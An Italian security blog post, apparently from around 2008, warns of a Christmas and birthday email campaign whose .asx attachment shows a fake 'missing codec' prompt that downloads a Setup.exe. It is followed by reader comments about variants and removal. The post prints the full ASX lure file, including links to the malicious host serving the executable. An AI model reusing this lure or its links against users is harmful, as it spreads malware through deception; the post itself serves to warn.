Tips & Tricks di sicurezza informatica
Alcuni giorni fa Adriano mi segnala la presenza di un nuovo malware che si spaccia per un file di codec che promette la corretta visualizzazione del video natalizio che arriva come allegato al messaggio di auguri tramite posta elettronica, stile PIO12.
Ecco il messaggio:
Subject: Babbo... natale??
Salve a tutti,
vi mando questo video davvero divertente,
con tantissimi auguri per un felice natale, buone feste e ottimo anno
nuovo!
Allegato: u_naltronatale.asx (1K)
Una volta scaricato ed eseguito con Windows MediaPlayer il file u_naltronatale.asx viene visualizzato il seguente messaggio:
Ovviamente non verrà scaricato un codec ma un file eseguibile Setup.exe con una icona simile al file di installazione dei codec. Di seguito l'icona dell'allegato con estensione .ASX e l'eseguibile:
Cosa contiene il file u_naltronatale.asx
<ASX version="3.0">
<ENTRY>
<TITLE>Impossibile Trovare il Codec</TITLE>
<REF href="http://www.codecsnet.biz/file.avi"/>
<DURATION VALUE="60:00"/>
<BANNER href="http://www.codecsnet.biz/img.gif">
<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
<MOREINFO href="http://www.codecsnet.biz/setup.exe" />
</BANNER>
</ENTRY>
</ASX>
Il file Setup.exe è compresso con exe32pack 1.42 prodotto da SteelBytes
Effetua delle chiamate alle API di Windows per la connessione remota e per installarsi nella macchina della vittima
Al momento non tutti gli antivirus sono in grado di rilevare il malware. Di seguito uno screenshot della scansione online su VirusTotal
(Clicca sull'immagine per ingrandirla) 
Fate attenzione agli allegati che arrivano con i messaggi di auguri e tenete sempre aggiornato il vostro software antivirus.
Vedi anche: Regali e auguri da evitare: Christmas.exe e Cartoline Virtuali
anke a me è arrivato da e-mail che conosco. un mio amico ha installato il codec ma come si può fare a debbellarlo?
Anche a me è arrivato; non avendo rilevato virus l'ho aperto con winamp ma il video era nero: cioè scorreva ma non c'erano ne' immagini ne' suono. Nessuna richiesta di download di codec.
Sapete se è pericoloso?
Grazie
Luca
anche a me è arrivata una mail con testo:
" Il video del mio compleanno,
indovina chi e' la persona che mi sta a fianco? "
e allegato un file "compleanno.asx". Uso AVG e lo ha ricevuto tranquillamente
Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!
Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!
Oggi mi è arrivata una variante dell'email: Compleanno. Passate le feste, per renderlo credibile utilizzano il compleanno. il testo dell'email ricalca gli altri: "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco? ". Stesso video con richiesta di installazione codec. Mi chiedo in quanti ci cascheranno?
Ciao
proprio oggi mi è arrivata una email con un allegato non conoscevo la trappola cmq il formato dell'allegato: il mio capodanno.asx mi ha insospettito eppoi diceva indovina chi ho accanto.....ma navigando in rete ho scoperto che è un virus...che palle...ma la gente non ha da fare altro che andare a molestare noi poveri utenti di internet?
tempo fa da un sito mi richiedevano di installare un codec bè l'ho fatto sembrava un sito attendibile mcrosoft ecc ecc mah ho nod32 antivirus e x ora mi ha difeso bene spero continui a fare il suo dovere!!boh mah intanto faccio una scansione profonda....
anche a me è arrivato! e ci sono cascata perchè mi è arrivato nella casella di posta desiderata e per di più dall'indirizzo di un mio conoscente facente parte dei miei contatti!!!
attenzione!
A me e' arrivato il messaggio "Filmato Capodanno" il cui testo era "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco?" contenente un filmato .asx che una volta aperto richiedeva di scaricare il codec.
Nonostante abbia più volte effettuato la scansione dei virus ancora non sono riuscito a debellare il famigerato virus che manda gli auguri di natale in mia vece con il famigerato allegato video
Come posso fare per cancellare questo virus?
Blogosfere è il più grande network italiano di blog professionali d'informazione.
Qui puoi trovare le ultime news su cronaca, politica, economia, cultura, scienze, tecnologia, spettacoli, moda, sport, motori, viaggi e cucina prodotte in perfetto stile multimediale.
Blogosfere Srl socio unico
P. IVA 05221970964
Sede legale: Via Pordenone 8 20132 Milano
REA n. 1804860
Privacy
Condizioni di utilizzo
Copyright © 2005-2012 Blogosfere
Quest'opera è pubblicata
con licenza Creative Commons
Attribution - Non commercial - No derivates
Per informazioni pubblicitarie e progetti speciali su Blogosfere (media brand del gruppo Populis) contattare la concessionaria pubblicitaria del gruppo, Populis Engage
alle 19:32
Gianni Amato
Prova con questo tool webdesk_destroy